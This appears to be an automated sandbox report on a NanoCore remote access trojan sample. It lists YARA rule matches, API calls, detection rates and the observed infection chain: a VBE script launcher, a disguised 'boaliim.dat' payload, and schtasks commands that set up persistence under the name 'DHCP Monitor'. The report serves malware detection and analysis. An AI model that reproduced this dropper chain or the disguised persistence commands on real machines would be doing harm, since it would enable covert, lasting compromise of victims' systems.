Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096EB78 appears 39 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096EC50 appears 56 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: String function: 0026FD60 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: String function: 00270DC0 appears 46 times

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_00956FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

Source: P05jmXYKpr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/36@16/2

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_00956C74 GetLastError,FormatMessageW,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: P05jmXYKpr.exe	ReversingLabs: Detection: 70%
Source: P05jmXYKpr.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File read: C:\Users\user\Desktop\P05jmXYKpr.exe

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\P05jmXYKpr.exe C:\Users\user\Desktop\P05jmXYKpr.exe
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B194F AdjustTokenPrivileges,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002D4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002C5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{72ec1ea3-16bf-4e76-a7cf-15ed5e2a0279}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_01

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: sfxname
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: sfxstime
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: STARTDLG

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File written: C:\Users\user\AppData\Local\Temp\RarSFX0\nibh.ini

Jump to behavior

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

